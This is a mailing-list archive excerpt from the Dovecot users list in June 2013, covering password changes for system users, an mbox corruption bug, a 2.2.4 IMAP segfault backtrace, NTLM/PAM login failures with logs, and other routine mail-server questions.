squirrelmail + plug-in or roundcube + plugin or directly > with a web interface to poppassd or usermin, or ... with a great impact on security at all * a sane webserver does not allow scripts exec() * you do *not* want the passwd command invoked from a website it is a broken design using system users and consider password changes for the users via whatever enduser procotol - virtual users stored in a database are the way to go if security matters -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 263 bytes Desc: OpenPGP digital signature URL: From ben at morrow.me.uk Wed Jun 26 06:40:20 2013 From: ben at morrow.me.uk (Ben Morrow) Date: Wed, 26 Jun 2013 04:40:20 +0100 Subject: [Dovecot] /etc/passwd Centos + dovecot In-Reply-To: <51C9F728.40800@thelounge.net> References: <51C9F728.40800@thelounge.net> Message-ID: <20130626034019.GA2428@anubis.morrow.me.uk> At 10PM +0200 on 25/06/13 you (Reindl Harald) wrote: > Am 25.06.2013 16:59, schrieb Paolo Andretta: > > On Tue, 25 Jun 2013, Dejan Doder wrote: > > > >> Hi group , I use system users with passwords defined in /etc/passwd. > >> How can users change their passwords ? > > > > I don't think this is dovecot related, but you can use squirrelmail > > + plug-in or roundcube + plugin or directly > > with a web interface to poppassd or usermin, or ... > > with a great impact on security at all > > * a sane webserver does not allow scripts exec() > * you do *not* want the passwd command invoked from a website > > it is a broken design using system users and consider password changes > for the users via whatever enduser procotol - virtual users stored > in a database are the way to go if security matters While I agree you want to keep passwords somewhere other than /etc/passwd (specifically, somewhere that does not require direct root access to change them), this is not incompatible with using system users. In my setup, I use system users, both for security reasons (it's more secure to have different users' imap processes running under different uids) and for the convenience of having one password across all services, but rather than keeping the passwords in /etc/passwd I keep them in Kerberos. This means the Dovecot auth-worker service doesn't need to run as root, it just needs a keytab it can verify users' tickets against, and the webmail password-changing interface can change a password without needing any special privileges. On the Dovecot side I use userdb passwd and passdb pam, with the 'dovecot' PAM service configured to use pam_krb5, and on the webmail side I use Roundcube with the 'password' plugin, configured to use PAM, with the 'php' PAM service also configured to use pam_krb5. (I had to patch pecl-pam to get it to pass the old and new passwords in properly with pam_set_item rather than using a conversation function and guessing at the prompts, but that's just expected PHP flakiness. I wish I could find a decent Perl webmail system...) I would imagine it would be straightforward to set up something similar with passwords in LDAP or SQL: the important thing is to set things up so that you check the passwords via PAM, so that different services will see the same passwords. The advantage of Kerberos or (I think) LDAP over SQL or anything similar is that once you've authenticated against the system (using the user's current password) you can change the password without any additional privilege. I think with SQL you would need to give PHP write access to the database, which sounds like a very bad idea. Possibly you could set something up with Postgres and a SECURITY DEFINER stored procedure, but I don't know how easy that would be. Obviously it goes without saying that you want to be very careful to make it impossible to change (say) root's password like this. In my case root's password actually does live in /etc/passwd, so anything not running as root cannot possibly change it. Ben From dalevizo at otenet.gr Wed Jun 26 10:21:34 2013 From: dalevizo at otenet.gr (Dimos Alevizos) Date: Wed, 26 Jun 2013 10:21:34 +0300 Subject: [Dovecot] Mbox corruption - Inbox beginning with 'FFrom' or 'FrFrom' In-Reply-To: <20130624104131.GB9999@otenet.gr> References: <51C1AB7B.9030404@otenet.gr> <4EAAD8C1-A99F-4D66-9FB6-32E634E4A8A5@iki.fi> <20130624104131.GB9999@otenet.gr> Message-ID: <51CA967E.1000701@otenet.gr> Hi, I haven't had the time to compile it yet, but a question just occurred. Given that it's so rare and we can't reproduce it on a dev server, how safe is this to use on a production server ? When you say "crash" you mean the whole dovecot server or that specific client's child ? D. -------- Original Message -------- Subject: Re: [Dovecot] Mbox corruption - Inbox beginning with 'FFrom' or 'FrFrom' From: dalevizo To: Timo Sirainen CC: dovecot at dovecot.org, Dimitris Paouris Date: 24/06/2013 01:41 ?? > Thanx I'll try the patch as soon as possible and I'll let you know. > It is indeed very rare. We're only seeing 4-5 corruptions in about 13 > million logins per day. > I've been trying to convince our design team that we should move to > maildir, but the truth is that it's quite a change, and we're way too > busy to deal with everything else AND a migration from mbox to maildir. > > D. > > On Mon 24/06/2013 13:16, Timo Sirainen wrote: >> On 19.6.2013, at 16.00, Dimos Alevizos wrote: >> >>> we're having some problems with our dovecot setup. >>> I've seen similar problems in the mailing list some years ago but alas wasn't able to find a solution. >>> >>> Our setup is as follows : >>> An MX farm (postfix) sends mails via LMTP to a director farm (dovecot 2.1.12) which proxies pop3/imap/lmtp traffic to a dovecot farm (dovecot 2.1.16). >>> All mailboxes and indexes are on NFS and all servers are Centos. >>> >>> The problem is that at times we see mailboxes (all of them are in mbox format) beginning with FFrom or FrFrom and of course dovecot says it's not a valid mbox file. >> >> This is quite an old bug, but it happens rarely enough that I haven't been able to reproduce and fix it. Actually people hadn't complained about it for a long time now, so I had assumed it had somehow gotten fixed already. >> >> With the attached debug patch it should crash instead of (completely) corrupting the mbox file. Debugging the resulting core file with gdb could be useful in figuring this out. >> >> Although I wouldn't recommend mbox format for any big installation anyway.. >> > > >> >> > From hans at dailystuff.nl Wed Jun 26 13:18:04 2013 From: hans at dailystuff.nl (Hans Spaans) Date: Wed, 26 Jun 2013 12:18:04 +0200 Subject: [Dovecot] Help installing Dovecot 1.0 on Debian 6.0.7 In-Reply-To: References: Message-ID: <1372241884.31313.7.camel@voyager.local> Roshan Dawrani schreef op di 25-06-2013 om 15:03 [+0530]: > Hi, > > Could someone please let me know if I can get the pre-built binaries for > Dovecot 1.0 for Debian 6.0? > > If I do "apt-get install dovecot...", I am getting Dovecot v1.2.5 > installed, but it doesn't like the existing Dovecot 1.0 configuration I > have, and due to some urgency, I am trying to avoid migrating the > configuration to the new structure / requirements. > > Regards, > Roshan I suspect you mean this one[1], but you can get all by Debian published versions at snapshot.debian.org. But then again 1.0 was never shipped[2] with Debian 6.0 and neither was version 1.2.5. You're sure you're not mixing Debian with Ubuntu LTS? Hans [1] http://snapshot.debian.org/package/dovecot/1%3A1.0.0-1/ [2] http://qa.debian.org/madison.php?package=dovecot&table=all&a=&c=&s=# From roshandawrani at gmail.com Wed Jun 26 13:36:17 2013 From: roshandawrani at gmail.com (Roshan Dawrani) Date: Wed, 26 Jun 2013 16:06:17 +0530 Subject: [Dovecot] Help installing Dovecot 1.0 on Debian 6.0.7 In-Reply-To: <1372241884.31313.7.camel@voyager.local> References: <1372241884.31313.7.camel@voyager.local> Message-ID: On Wed, Jun 26, 2013 at 3:48 PM, Hans Spaans wrote: > > But then again 1.0 was never shipped[2] > with Debian 6.0 and neither was version 1.2.5. You're sure you're not > mixing Debian with Ubuntu LTS? > Thanks for the pointers. I don't think I am mixing Debian with Ubuntu. "lsb_release -a" shows "Debian GNU/Linux 6.0.7 (squeeze)" Our apt sources points to "http://http.us.debian.org/debian/" and after "apt-get install dovecot", "dovecot --version" showed "1.2.15" (not 1.2.5, sorry about the typo earlier) From tom at knitatoms.net Wed Jun 26 13:41:46 2013 From: tom at knitatoms.net (Tom Atkins) Date: Wed, 26 Jun 2013 11:41:46 +0100 Subject: [Dovecot] How to manage email with an ISP restricted mailbox size? Message-ID: Sorry if this is a bit off topic but I'm hoping list members here might have some ideas. Aim: use ISP provided email with restricted inbox size but keep an IMAP accessible archive of emails (including 'sent' messages) on a remote server. Scenario: - Don't want to run my own SMTP server - Have free ISP email with 1Gb mailbox limit and spam filtering that works well - Have remote server with plenty of disk space - Want to use remote server for IMAP access to archive of email to avoid 1Gb ISP mailbox limit Options I tried: 1. Use ISP email via IMAP and periodically backup / archive messages to remote server with something like mbsync / isync to maildir format. Delete old messages on ISP server safe in knowledge they are backed up on my server. QUESTION: how to access those archives via IMAP (read only is OK)? 2. Use ISP email for sending messages only. Use Getmail / Fetchmail to move messages to remote server and run Dovecot there. I tried using Getmail to do this but couldn't figure out how to keep copies of 'Sent' and 'Draft' messages if the email client was configured to read via IMAP on one server and send via SMTP to another server. Any thoughts on how best to achieve my aims? Thanks, Tom. From marcin at mejor.pl Wed Jun 26 14:16:21 2013 From: marcin at mejor.pl (=?UTF-8?B?TWFyY2luIE1pcm9zxYJhdw==?=) Date: Wed, 26 Jun 2013 13:16:21 +0200 Subject: [Dovecot] Dovecot 2.2.4 - Fatal: master: service(imap): child 44562 killed with signal 11 Message-ID: <51CACD85.80006@mejor.pl> Hi all! I just upgraded dovecot from 2.2.2 to 2.2.4. Now I can't login to imap, proces imap throws segfault. Here is snip from dovecot.log: 2013-06-25T23:06:47.824321+02:00 meteor dovecot: imap-login: Login: user=, method=PLAIN, rip=2001:470:1f0b:1ab3:1bc:3b24:d355:b142, lip=2001:470:1f15:1b61::2, mpid=44562, TLS, session= 2013-06-25T23:06:47.827616+02:00 meteor dovecot: imap(marcin at mejor.pl) : Warning: autocreate plugin is deprecated, use mailbox { auto } setting instead 2013-06-25T23:06:47.830425+02:00 meteor dovecot: imap(marcin at mejor.pl) : Fatal: master: service(imap): child 44562 killed with signal 11 (core dumped) Here is bt created using gdb: Reading symbols from /usr/libexec/dovecot/imap...Reading symbols from /usr/lib64/debug/usr/libexec/dovecot/imap.debug...done. done. [New LWP 17730] [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib64/libthread_db.so.1". Core was generated by `dovecot/imap'. Program terminated with signal 11, Segmentation fault. #0 imapc_storage_try_get_root_sep (storage=0x0, sep_r=0x3f7bad9bbd7 "") at imapc-storage.c:229 229 i_assert(storage->list != NULL); (gdb) Thread 1 (Thread 0x38656679700 (LWP 17730)): #0 imapc_storage_try_get_root_sep (storage=0x0, sep_r=0x3f7bad9bbd7 "") at imapc-storage.c:229 #1 0x00000386567b8b05 in imapc_list_get_hierarchy_sep (_list=) at imapc-list.c:196 #2 0x00000386567b8fff in imapc_list_get_fs_name (list=0xdba28f030, name=0x0) at imapc-list.c:282 #3 0x00000386567b9291 in imapc_list_get_path (_list=, name=0x0, type=MAILBOX_LIST_PATH_TYPE_MAILBOX, path_r=0x3f7bad9bcc8) at imapc-list.c:323 #4 0x00000386567db675 in mailbox_list_get_root_path (list=, type=, path_r=0x3f7bad9bcc8) at mailbox-list.c:1258 #5 0x0000038655c75d15 in quota_add_user_namespace (quota=0xdba288e80, ns=0xdba28eee0) at quota.c:704 #6 0x0000038655c7d0ea in quota_mailbox_list_created (list=0xdba292480) at quota-storage.c:590 #7 0x00000386567d64d2 in hook_mailbox_list_created (list=0xdba292480) at mail-storage-hooks.c:319 #8 0x00000386567da297 in mailbox_list_create (driver=, ns=0xdba28eee0, set=0x3f7bad9be20, flags=, list_r=0xdba28f228, error_r=0x3f7bad9be80) at mailbox-list.c:206 #9 0x00000386567b8f63 in imapc_list_get_fs (list=0xdba28f030) at imapc-list.c:265 #10 0x00000386567b927e in imapc_list_get_path (_list=, name=0x0, type=MAILBOX_LIST_PATH_TYPE_MAILBOX, path_r=0x3f7bad9bf18) at imapc-list.c:319 #11 0x00000386567db675 in mailbox_list_get_root_path (list=, type=, path_r=0x3f7bad9bf18) at mailbox-list.c:1258 #12 0x0000038655c75d15 in quota_add_user_namespace (quota=0xdba288e80, ns=0xdba28eee0) at quota.c:704 #13 0x0000038655c7d0ea in quota_mailbox_list_created (list=0xdba28f030) at quota-storage.c:590 #14 0x00000386567d64d2 in hook_mailbox_list_created (list=0xdba28f030) at mail-storage-hooks.c:319 #15 0x00000386567da297 in mailbox_list_create (driver=, ns=0xdba28eee0, set=0x3f7bad9c090, flags=, list_r=0x3f7bad9c0e8, error_r=0x3f7bad9c1a0) at mailbox-list.c:206 #16 0x00000386567d15c1 in mail_storage_create_full (ns=0xdba28eee0, driver=, data=, flags=(unknown: 0), storage_r=0x3f7bad9c150, error_r=0x3f7bad9c1a0) at mail-storage.c:356 #17 0x00000386567d181c in mail_storage_create (ns=, driver=, flags=, error_r=) at mail-storage.c:407 #18 0x00000386567c9b25 in namespace_add (user=0xdba283e90, ns_set=, unexpanded_ns_set=0xdba284668, mail_set=0xdba284f98, ns_p=0xdba28c5b0, error_r=0x3f7bad9c300) at mail-namespace.c:170 #19 0x00000386567caba7 in mail_namespaces_init (user=0xdba283e90, error_r=0x3f7bad9c300) at mail-namespace.c:344 #20 0x00000386567e1acf in mail_storage_service_init_post (error_r=0x3f7bad9c300, mail_user_r=0x3f7bad9c3d0, priv=0x3f7bad9c2d0, user=0xdba272c38, ctx=) at mail-storage-service.c:653 #21 mail_storage_service_next (ctx=, user=0xdba272c38, mail_user_r=0x3f7bad9c3d0) at mail-storage-service.c:1158 #22 0x00000386567e1e35 in mail_storage_service_lookup_next (ctx=0xdba26e4b0, input=, user_r=0x3f7bad9c3c8, mail_user_r=0x3f7bad9c3d0, error_r=0x3f7bad9c430) at mail-storage-service.c:1193 #23 0x0000000db6f824e9 in client_create_from_input (input=0x3f7bad9c440, login_client=0xdba270660, fd_in=12, fd_out=12, input_buf=0x3f7bad9c4b0, error_r=) at main.c:204 #24 0x0000000db6f827f7 in login_client_connected (client=0xdba270660, username=, extra_fields=) at main.c:277 #25 0x00000386566a97e6 in master_login_auth_finish (client=0xdba270660, auth_args=) at master-login.c:209 #26 0x00000386566a9b45 in master_login_auth_callback (auth_args=0xdba264ee8, errormsg=0x0, context=) at master-login.c:377 #27 0x00000386566aa558 in master_login_auth_input_user (args=, auth=) at master-login-auth.c:243 #28 master_login_auth_input (auth=0xdba26fa10) at master-login-auth.c:363 #29 0x0000038656704cf6 in io_loop_call_io (io=0xdba2709f0) at ioloop.c:387 #30 0x0000038656705f0f in io_loop_handler_run (ioloop=) at ioloop-epoll.c:215 #31 0x00000386567046f0 in io_loop_run (ioloop=0xdba26d2b0) at ioloop.c:406 #32 0x00000386566ac017 in master_service_run (service=0xdba26d140, callback=) at master-service.c:560 #33 0x0000000db6f82ebc in main (argc=1, argv=0xdba26cf20) at main.c:400 (gdb) quit doveconf -n: # 2.2.4: /etc/dovecot/dovecot.conf # OS: Linux 3.9.6-hardened x86_64 Gentoo Base System release 2.2 auth_cache_size = 1 k auth_mechanisms = login digest-md5 cram-md5 plain deliver_log_format = msgid=%m: from=%f: phys=%p: virt=%w %$ dict { quota = pgsql:/etc/dovecot/dovecot-dict-sql.conf.ext } first_valid_uid = 8 last_valid_uid = 8 lda_mailbox_autocreate = yes lda_mailbox_autosubscribe = yes mail_attachment_dir = /dane/domeny/zalaczniki mail_attachment_min_size = 10000 k mail_cache_min_mail_count = 20 mail_gid = mail mail_log_prefix = "%s(%u) <%{session}>: " mail_plugins = autocreate quota notify mail_log stats zlib mail_privileged_group = mail mail_uid = mail maildir_stat_dirs = yes managesieve_notify_capability = mailto managesieve_sieve_capability = fileinto reject envelope encoded-character vacation subaddress comparator-i;ascii-numeric relational regex imap4flags copy include variables body enotify environment mailbox date ihave mdbox_preallocate_space = yes mdbox_rotate_interval = 60 days mdbox_rotate_size = 50 M namespace inbox { inbox = yes list = yes location = mailbox Drafts { special_use = \Drafts } mailbox Junk { special_use = \Junk } mailbox Sent { special_use = \Sent } mailbox "Sent Messages" { special_use = \Sent } mailbox Trash { special_use = \Trash } prefix = separator = . subscriptions = yes } passdb { args = /etc/dovecot/dovecot-sql.conf.ext driver = sql } plugin { autocreate = Trash autocreate2 = Spam autocreate3 = Sent autocreate4 = Drafts autosubscribe = Trash autosubscribe2 = Spam autosubscribe3 = Sent autosubscribe4 = Drafts quota = dict:User quota::proxy::quota sieve = ~/.dovecot.sieve sieve_dir = ~/sieve stats_command_min_time = 1 mins stats_domain_min_time = 12 hours stats_ip_min_time = 12 hours stats_memory_limit = 1M stats_refresh = 30 s stats_session_min_time = 15 mins stats_track_cmds = yes stats_user_min_time = 1 hours zlib_save = gz } postmaster_address = postmaster at mejor.pl protocols = imap pop3 sieve service auth { unix_listener auth-userdb { group = mail mode = 0660 user = root } } service dict { unix_listener dict { user = mail } } service stats { fifo_listener stats-mail { mode = 0600 user = mail } } ssl_cert = References: Message-ID: <51CACF41.40707@sys4.de> Am 26.06.2013 12:41, schrieb Tom Atkins: > Sorry if this is a bit off topic but I'm hoping list members here might > have some ideas. > > Aim: use ISP provided email with restricted inbox size but keep an IMAP > accessible archive of emails (including 'sent' messages) on a remote server. > > Scenario: > > - Don't want to run my own SMTP server > - Have free ISP email with 1Gb mailbox limit and spam filtering that works > well > - Have remote server with plenty of disk space > - Want to use remote server for IMAP access to archive of email to avoid > 1Gb ISP mailbox limit > > Options I tried: > > 1. Use ISP email via IMAP and periodically backup / archive messages to > remote server with something like mbsync / isync to maildir format. Delete > old messages on ISP server safe in knowledge they are backed up on my > server. QUESTION: how to access those archives via IMAP (read only is OK)? > > 2. Use ISP email for sending messages only. Use Getmail / Fetchmail to move > messages to remote server and run Dovecot there. I tried using Getmail to > do this but couldn't figure out how to keep copies of 'Sent' and 'Draft' > messages if the email client was configured to read via IMAP on one server > and send via SMTP to another server. > > Any thoughts on how best to achieve my aims? you must not use getmail ( however it should work too ) , you can always use imapsync sorry only german but tec details should be understandable anyway http://sys4.de/de/blog/2013/04/12/abholdienst-fur-mail/ http://sys4.de/de/blog/2013/04/26/mail-migration-mit-imapsync/ > > Thanks, Tom. > Best Regards MfG Robert Schetterer -- [*] sys4 AG http://sys4.de, +49 (89) 30 90 46 64 Franziskanerstra?e 15, 81669 M?nchen Sitz der Gesellschaft: M?nchen, Amtsgericht M?nchen: HRB 199263 Vorstand: Patrick Ben Koetter, Axel von der Ohe, Marc Schiffbauer Aufsichtsratsvorsitzender: Florian Kirstein From darvin.denmian at gmail.com Wed Jun 26 18:47:03 2013 From: darvin.denmian at gmail.com (Darvin Denmian) Date: Wed, 26 Jun 2013 12:47:03 -0300 Subject: [Dovecot] Dovecot FTS using ElasticSearch Message-ID: Hi, I would like to know if is possible to use ElasticSearch instead of Solr for FTS. Regards, Erick Vitor de Barros. From tss at iki.fi Wed Jun 26 18:52:47 2013 From: tss at iki.fi (Timo Sirainen) Date: Wed, 26 Jun 2013 18:52:47 +0300 Subject: [Dovecot] Dovecot FTS using ElasticSearch In-Reply-To: References: Message-ID: On 26.6.2013, at 18.47, Darvin Denmian wrote: > I would like to know if is possible to use ElasticSearch instead of Solr > for FTS. Sure, just as soon as someone implements it. Since it has HTTP based API, it shouldn't be difficult to implement based on fts-solr code (in v2.2). I don't have time for it myself though. From darvin.denmian at gmail.com Wed Jun 26 18:57:31 2013 From: darvin.denmian at gmail.com (Darvin Denmian) Date: Wed, 26 Jun 2013 12:57:31 -0300 Subject: [Dovecot] Dovecot FTS using ElasticSearch In-Reply-To: References: Message-ID: Thanks! On Wed, Jun 26, 2013 at 12:52 PM, Timo Sirainen wrote: > On 26.6.2013, at 18.47, Darvin Denmian wrote: > > > I would like to know if is possible to use ElasticSearch instead of Solr > > for FTS. > > Sure, just as soon as someone implements it. Since it has HTTP based API, > it shouldn't be difficult to implement based on fts-solr code (in v2.2). I > don't have time for it myself though. > > From tss at iki.fi Wed Jun 26 18:59:26 2013 From: tss at iki.fi (Timo Sirainen) Date: Wed, 26 Jun 2013 18:59:26 +0300 Subject: [Dovecot] Mbox corruption - Inbox beginning with 'FFrom' or 'FrFrom' In-Reply-To: <51CA967E.1000701@otenet.gr> References: <51C1AB7B.9030404@otenet.gr> <4EAAD8C1-A99F-4D66-9FB6-32E634E4A8A5@iki.fi> <20130624104131.GB9999@otenet.gr> <51CA967E.1000701@otenet.gr> Message-ID: <625F4988-B777-4DB0-84FF-E5ED6A5EFD14@iki.fi> It crashes one specific IMAP/POP3 session, so others are unaffected. The potential problems: * It might cause the user's mbox to become crashing constantly. so first crash -> client reconnects -> client attempts the same operation -> crash again. Then again, this might not happen, it depends. * The mbox file would probably become slightly more corrupted than normally, because it doesn't finish moving data around. No data should get actually lost, but some parts could become duplicated (e.g. some headers or even mails, possibly causing UID renumbering = redownloading). So not ideal in production, but shouldn't be too bad either, especially if you just wait for the first crash and then immediately switch to the old unpatched version. On 26.6.2013, at 10.21, Dimos Alevizos wrote: > Hi, > > I haven't had the time to compile it yet, but a question just occurred. > Given that it's so rare and we can't reproduce it on a dev server, how safe is this to use on a production server ? > When you say "crash" you mean the whole dovecot server or that specific client's child ? > > D. > > -------- Original Message -------- > Subject: Re: [Dovecot] Mbox corruption - Inbox beginning with 'FFrom' or 'FrFrom' > From: dalevizo > To: Timo Sirainen > CC: dovecot at dovecot.org, Dimitris Paouris > Date: 24/06/2013 01:41 ?? > >> Thanx I'll try the patch as soon as possible and I'll let you know. >> It is indeed very rare. We're only seeing 4-5 corruptions in about 13 >> million logins per day. >> I've been trying to convince our design team that we should move to >> maildir, but the truth is that it's quite a change, and we're way too >> busy to deal with everything else AND a migration from mbox to maildir. >> >> D. >> >> On Mon 24/06/2013 13:16, Timo Sirainen wrote: >>> On 19.6.2013, at 16.00, Dimos Alevizos wrote: >>> >>>> we're having some problems with our dovecot setup. >>>> I've seen similar problems in the mailing list some years ago but alas wasn't able to find a solution. >>>> >>>> Our setup is as follows : >>>> An MX farm (postfix) sends mails via LMTP to a director farm (dovecot 2.1.12) which proxies pop3/imap/lmtp traffic to a dovecot farm (dovecot 2.1.16). >>>> All mailboxes and indexes are on NFS and all servers are Centos. >>>> >>>> The problem is that at times we see mailboxes (all of them are in mbox format) beginning with FFrom or FrFrom and of course dovecot says it's not a valid mbox file. >>> >>> This is quite an old bug, but it happens rarely enough that I haven't been able to reproduce and fix it. Actually people hadn't complained about it for a long time now, so I had assumed it had somehow gotten fixed already. >>> >>> With the attached debug patch it should crash instead of (completely) corrupting the mbox file. Debugging the resulting core file with gdb could be useful in figuring this out. >>> >>> Although I wouldn't recommend mbox format for any big installation anyway.. >>> >> >> >>> >>> >> > From jacky.lau at live.com Wed Jun 26 20:27:54 2013 From: jacky.lau at live.com (LauJacky) Date: Wed, 26 Jun 2013 17:27:54 +0000 Subject: [Dovecot] =?utf-8?q?Dovecot-2=2E2=2E4_compiled_error=E2=80=8F?= Message-ID: I compiled dovecot error, google did not find a solution. and I don't understand the code, how can i do Compiled dovecot-2.2.4 in "Linux OLinux 2.6.32-200.13.1.el5uek #1 SMP Wed Jul 27 21:02:33 EDT 2011 x86_64 x86_64 x86_64 GNU/Linux "environment variables : #CPPFLAGS="-I/usr/include/openssl" LDFLAGS="-L/usr/lib/openssl" ./configure --with-ldap #make........gcc -DHAVE_CONFIG_H -I. -I../.. -I../../src/lib -I../../src/lib-settings -I../../src/lib-master -DPKG_RUNDIR=\""/usr/local/var/run/dovecot"\" -DPKG_STATEDIR=\""/usr/local/var/lib/dovecot"\" -DPKG_LIBEXECDIR=\""/usr/local/libexec/dovecot"\" -DBINDIR=\""/usr/local/bin"\" -I/usr/include/openssl -std=gnu99 -g -O2 -Wall -W -Wmissing-prototypes -Wmissing-declarations -Wpointer-arith -Wchar-subscripts -Wformat=2 -Wbad-function-cast -fno-builtin-strftime -Wstrict-aliasing=2 -I/usr/kerberos/include -MT capabilities-posix.o -MD -MP -MF .deps/capabilities-posix.Tpo -c -o capabilities-posix.o capabilities-posix.cIn file included from /usr/include/sys/capability.h:34, from capabilities-posix.c:8:/usr/include/linux/capability.h:73: error: expected specifier-qualifier-list before ???__le32???make[3]: *** [capabilities-posix.o] Error 1make[3]: Leaving directory `/home/ldf/dovecot-2.2.4/src/master'make[2]: *** [all-recursive] Error 1make[2]: Leaving directory `/home/ldf/dovecot-2.2.4/src'make[1]: *** [all-recursive] Error 1make[1]: Leaving directory `/home/ldf/dovecot-2.2.4'make: *** [all] Error 2 Best regardjacky From mariajose1982 at gmail.com Wed Jun 26 20:40:10 2013 From: mariajose1982 at gmail.com (=?ISO-8859-1?Q?Maria_Jose_Ya=F1ez_Dacosta?=) Date: Wed, 26 Jun 2013 14:40:10 -0300 Subject: [Dovecot] NTLM authentication with dovecot. Message-ID: Hi!, I'm trying to use single sign on from Windows. Install dovecot on CentOS 6. The host name is prueba-mail. I'm using version 2.0.9 because the latest 64-bit gives errors. But first I wanted to test whether user validation works with telnet. When I try to try "telnet prueba-mail imap" and try to "a1 LOGIN MyUsername MyPassword", I get the following error:prueba-mail dovecot: auth: pam(pepe,190.108.101.120): unknown user. I show my setup and I appreciate even the minimal support. ----------------( dovecot --version )------------------------ dovecot --version ----------------( dovecot -n )------------------------------ # 2.0.9: /etc/dovecot/dovecot.conf # OS: Linux 2.6.32-358.6.2.el6.x86_64 x86_64 CentOS release 6.4 (Final) auth_debug = yes auth_mechanisms = plain login ntlm auth_use_winbind = yes auth_username_format = %n disable_plaintext_auth = no mbox_write_locks = fcntl passdb { driver = pam } protocols = imap pop3 ssl = no userdb { args = uid=10000 gid=10000 home=/mail/%d/%n driver = static } ----------------( wbinfo -t )------------------------------ checking the trust secret for domain FNR via RPC calls succeeded ----------------( wbinfo -u )------------------------------ list all users ----------------( wbinfo -g )------------------------------ list all groups ------------( /usr/bin/ntlm_auth --username=pepe )--------- password: NT_STATUS_OK: Success (0x0) ------------( tail -n 500 -f /var/log/maillog )------------- Jun 26 14:02:04 prueba-mail dovecot: master: Dovecot v2.0.9 starting up (core dumps disabled) Jun 26 14:03:22 prueba-mail dovecot: auth: Debug: Loading modules from directory: /usr/lib64/dovecot/auth Jun 26 14:03:22 prueba-mail dovecot: auth: Debug: Module loaded: /usr/lib64/dovecot/auth/libauthdb_ldap.so Jun 26 14:03:22 prueba-mail dovecot: auth: Debug: Module loaded: /usr/lib64/dovecot/auth/libdriver_sqlite.so Jun 26 14:03:22 prueba-mail dovecot: auth: Debug: Module loaded: /usr/lib64/dovecot/auth/libmech_gssapi.so Jun 26 14:03:22 prueba-mail dovecot: auth: Debug: auth client connected (pid=1691) Jun 26 14:03:39 prueba-mail dovecot: auth: Debug: client in: AUTH#0111#011PLAIN#011service=imap#011lip=190.108.101.200#011rip=190.108.101.120#011lport=143#011rport=38118#011resp= Jun 26 14:03:39 prueba-mail dovecot: auth: Debug: Loading modules from directory: /usr/lib64/dovecot/auth Jun 26 14:03:39 prueba-mail dovecot: auth: Debug: Module loaded: /usr/lib64/dovecot/auth/libauthdb_ldap.so Jun 26 14:03:39 prueba-mail dovecot: auth: Debug: Module loaded: /usr/lib64/dovecot/auth/libdriver_sqlite.so Jun 26 14:03:39 prueba-mail dovecot: auth: Debug: Module loaded: /usr/lib64/dovecot/auth/libmech_gssapi.so Jun 26 14:03:39 prueba-mail dovecot: auth: Debug: pam(pepe,190.108.101.120): lookup service=dovecot Jun 26 14:03:39 prueba-mail dovecot: auth: Debug: pam(pepe,190.108.101.120): #1/1 style=1 msg=Password: Jun 26 14:03:42 prueba-mail dovecot: auth: pam(pepe,190.108.101.120): unknown user Jun 26 14:03:44 prueba-mail dovecot: auth: Debug: client out: FAIL#0111#011user=pepe Jun 26 14:06:22 prueba-mail dovecot: imap-login: Disconnected: Inactivity (auth failed, 1 attempts): user=, method=PLAIN, rip=190.108.101.120, lip=190.108.101.200 -- Maria Jos? From mariajose1982 at gmail.com Wed Jun 26 21:17:01 2013 From: mariajose1982 at gmail.com (=?ISO-8859-1?Q?Maria_Jose_Ya=F1ez_Dacosta?=) Date: Wed, 26 Jun 2013 15:17:01 -0300 Subject: [Dovecot] Passdb + single sing on + NTLM + Thunderbird. Message-ID: Hi!, I want to use single sign on from Windows with Thunderbird or Outlook using NTLM. Which should be placed in the configuration file for passdb?. Currently I have: passdb { driver = pam } But it generates the following error when trying to check mail: dovecot: auth: pam (pepe, 190 108 101 120): unknown user If I remove imap passdb just does not work and I add at the end of this mail the log. Thank :) ----------------( dovecot -n )------------------------------ # 2.0.9: /etc/dovecot/dovecot.conf # OS: Linux 2.6.32-358.6.2.el6.x86_64 x86_64 CentOS release 6.4 (Final) auth_debug = yes auth_mechanisms = plain login ntlm auth_use_winbind = yes auth_username_format = %n disable_plaintext_auth = no mbox_write_locks = fcntl passdb { driver = pam } protocols = imap pop3 ssl = no userdb { args = uid=10000 gid=10000 home=/mail/%d/%n driver = static } ----------------( wbinfo -t )------------------------------ checking the trust secret for domain FNR via RPC calls succeeded ----------------( wbinfo -u )------------------------------ list all users ----------------( wbinfo -g )------------------------------ list all groups ------------( /usr/bin/ntlm_auth --username=pepe )--------- password: NT_STATUS_OK: Success (0x0) ------------( tail -n 500 -f /var/log/maillog )------------- Jun 26 14:58:41 prueba-mail dovecot: master: Dovecot v2.0.9 starting up (core dumps disabled) Jun 26 14:59:00 prueba-mail dovecot: auth: Debug: Loading modules from directory: /usr/lib64/dovecot/auth Jun 26 14:59:00 prueba-mail dovecot: auth: Debug: Module loaded: /usr/lib64/dovecot/auth/libauthdb_ldap.so Jun 26 14:59:00 prueba-mail dovecot: auth: Debug: Module loaded: /usr/lib64/dovecot/auth/libdriver_sqlite.so Jun 26 14:59:00 prueba-mail dovecot: auth: Debug: Module loaded: /usr/lib64/dovecot/auth/libmech_gssapi.so Jun 26 14:59:00 prueba-mail dovecot: auth: Fatal: No passdbs specified in configuration file. LOGIN mechanism needs one Jun 26 14:59:00 prueba-mail dovecot: master: Error: service(auth): command startup failed, throttling Jun 26 14:59:35 prueba-mail dovecot: imap-login: Error: Timeout waiting for handshake from auth server. my pid=1734, input bytes=0 Jun 26 15:00:00 prueba-mail dovecot: auth: Debug: Loading modules from directory: /usr/lib64/dovecot/auth Jun 26 15:00:00 prueba-mail dovecot: auth: Debug: Module loaded: /usr/lib64/dovecot/auth/libauthdb_ldap.so Jun 26 15:00:00 prueba-mail dovecot: auth: Debug: Module loaded: /usr/lib64/dovecot/auth/libdriver_sqlite.so Jun 26 15:00:00 prueba-mail dovecot: auth: Debug: Module loaded: /usr/lib64/dovecot/auth/libmech_gssapi.so Jun 26 15:00:00 prueba-mail dovecot: auth: Fatal: No passdbs specified in configuration file. LOGIN mechanism needs one Jun 26 15:00:00 prueba-mail dovecot: master: Error: service(auth): command startup failed, throttling Jun 26 15:00:30 prueba-mail dovecot: imap-login: Error: Timeout waiting for handshake from auth server. my pid=1734, input bytes=0 -- Maria Jos? From tss at iki.fi Wed Jun 26 22:08:38 2013 From: tss at iki.fi (Timo Sirainen) Date: Wed, 26 Jun 2013 22:08:38 +0300 Subject: [Dovecot] v2.1.17 released Message-ID: 